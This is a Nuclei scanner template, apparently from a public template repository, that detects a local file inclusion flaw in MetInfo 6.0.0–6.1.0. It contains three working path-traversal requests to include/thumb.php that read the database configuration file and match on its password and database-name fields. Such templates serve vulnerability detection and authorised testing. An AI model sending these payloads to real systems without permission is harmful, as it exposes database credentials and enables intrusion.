nuclei-templates/vulnerabilities/other/metinfo-lfi.yaml

39 lines
1.0 KiB
YAML
Raw Normal View History

2021-02-20 00:25:43 +00:00
id: metinfo-lfi
2021-02-20 00:25:43 +00:00
info:
name: MetInfo <=6.1.0 - Local File Inclusion
2021-02-20 00:25:43 +00:00
author: pikpikcu
severity: high
description: MetInfo 6.0.0 through 6.1.0 is vulnerable to local file inclusion and allows remote unauthenticated attackers access to locally stored files and their content.
reference:
- https://paper.seebug.org/676/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2021-02-20 13:54:20 +00:00
tags: metinfo,lfi
2021-02-20 00:25:43 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
- '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
- '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
2021-10-02 12:27:33 +00:00
2021-10-02 06:42:22 +00:00
stop-at-first-match: true
2021-02-20 00:25:43 +00:00
matchers-condition: and
matchers:
2021-10-02 12:27:33 +00:00
2021-02-20 00:25:43 +00:00
- type: word
words:
- "con_db_pass"
- "con_db_name"
part: body
condition: and
2021-10-02 12:27:59 +00:00
2021-02-20 00:25:43 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/07/27